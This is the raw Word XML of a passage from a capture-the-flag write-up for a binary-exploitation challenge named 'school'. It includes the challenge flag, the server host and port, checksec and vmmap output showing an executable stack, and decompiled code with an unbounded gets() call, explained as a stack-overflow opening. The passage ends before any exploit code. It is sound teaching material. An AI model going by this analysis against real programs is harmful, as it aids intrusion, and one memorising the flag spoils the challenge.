        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="51F39D1B" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="005264D0" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00046BED">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>flag{first_day_of_pwn_school}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00847435" w:rsidRPr="005264D0" w14:paraId="0D777826" w14:textId="77777777" w:rsidTr="008A799C">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47931231" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="005264D0" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="702DCDD8" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00EE0A5C" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="283ED4D3" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="005264D0" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E676B6">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>offsec-chalbroker.osiris.cyber.nyu.edu 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>338</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00847435" w:rsidRPr="005264D0" w14:paraId="5046D850" w14:textId="77777777" w:rsidTr="008A799C">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3B4906F2" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="005264D0" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7B9C5424" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00EE0A5C" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Lore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3754EE4D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Executable Stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00847435" w:rsidRPr="005264D0" w14:paraId="493DFE21" w14:textId="77777777" w:rsidTr="008A799C">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48E554D2" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="005264D0" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="20F3DB60" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00EE0A5C" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="4633B89B" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>school</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A4B2070" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc160920111"/>
      <w:r w:rsidRPr="00840BBB">
        <w:t>Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="5F284A78" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">On the first run, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00046BED">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>school</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> binary asks for directions, prints the user input, and exits.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="4789C7CD" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="27BDB902" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>┌──(kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r>
              <w:t>kali)-[~/Desktop/5-Week]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="346F4C48" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">└─$ ./school      </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CCE35BB" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Let's go to school! School's at: </w:t>
            </w:r>
            <w:r w:rsidRPr="00046BED">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0x7ffcfdb98500</w:t>
            </w:r>
            <w:r>
              <w:t>. gimme directions:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DF01D06" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Skip school!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F966410" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Hi, Skip school!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BC2E568" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>First Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE789C4" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t>The program prints out an address in its message. Unfortunately, the leaked value is not the solution.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="15D4F8AB" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="197"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="239D0CE1" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>┌──(kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r>
              <w:t>kali)-[~/Desktop/5-Week]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B03E40F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ ./school</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F5108DD" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Let's go to school! School's at: </w:t>
            </w:r>
            <w:r w:rsidRPr="00046BED">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0x7ffd79eaaa30</w:t>
            </w:r>
            <w:r>
              <w:t>. gimme directions:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22CDD1F7" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x7ffcfdb98500</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CFCB5BD" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Hi, 0x7ffcfdb98500</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="265465E7" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Had to Try It</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED62816" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The leaked address appears to be from the program stack, which can be confirmed using </w:t>
      </w:r>
      <w:r w:rsidRPr="00046BED">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Vmmap</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="7AFAC74E" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="48CC8D50" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Start              End                Offset             Perm Path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A560E2D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x0000000000400000 0x0000000000401000 0x0000000000000000 r-x /home/kali/Desktop/5-Week/school</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="026AC592" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x0000000000600000 0x0000000000601000 0x0000000000000000 r-- /home/kali/Desktop/5-Week/school</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="552A10C2" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x0000000000601000 0x0000000000602000 0x0000000000001000 rw- /home/kali/Desktop/5-Week/school</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49D1CE73" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="10E9F8CF" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rwx [stack]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01BCFEB0" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Program Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A836973" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">As shown in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00046BED">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Vmmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> output and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00046BED">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Checksec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> results below, the program stack for </w:t>
      </w:r>
      <w:r w:rsidRPr="00046BED">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>school</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is readable, writeable, and executable.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6835"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="687EEE37" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:trHeight w:val="197"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2E712D82" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] '/home/kali/Desktop/5-Week/school'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46EB9EB5" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Arch:     amd64-64-little</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58344E5C" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    RELRO:    Partial RELRO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69AEF9A2" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Stack:    No canary found</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78ABB05D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>NX:       NX unknown - GNU_STACK missing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D99CAEE" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    PIE:      No PIE (0x400000)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="400B0313" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Stack:    Executable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0181B810" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    RWX:      Has RWX segments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68859ADB" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Checksec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6892B7EC" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A program should not have an executable stack. Programs write and read data to/from the stack, often including user input. An attacker may leverage this issue to store arbitrary code on the stack that the program will execute later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA6B5F2" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE468E">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>school</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> main method is straightforward. The address school prints is the pointer to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE468E">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> array. The program passes this pointer to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE468E">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to read in the user input. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE468E">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function is insecure and will overwrite the stack if the user input exceeds the allotted size, which an attacker can leverage to perform a stack overflow.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="482AC27F" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="199EDD42" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>undefined8 main(EVP_PKEY_CTX *param_1){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E9AE65E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  char data [32];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1784A999" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  init(param_1);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="576B1963" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  printf("Let\'s go to school! School\'s at: %p. gimme directions:\n",data);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42B9DDC1" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  gets(data);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F7D1971" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  printf("Hi, %s\n",data);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D45E635" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  return 0;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D9D574B" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B744B7E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Main Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2780F3F2" w14:textId="54ADF49E" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00847435">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> method is very similar to the one used in the </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Backdoor_1" w:history="1">
        <w:r w:rsidRPr="00FE468E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Backdoor challenge</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Unfortunately, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE468E">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>school</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> does not have unused functions like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE468E">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> did. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE468E">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">school </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">binary does not even import the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE468E">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> library like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE468E">
        <w:rPr>
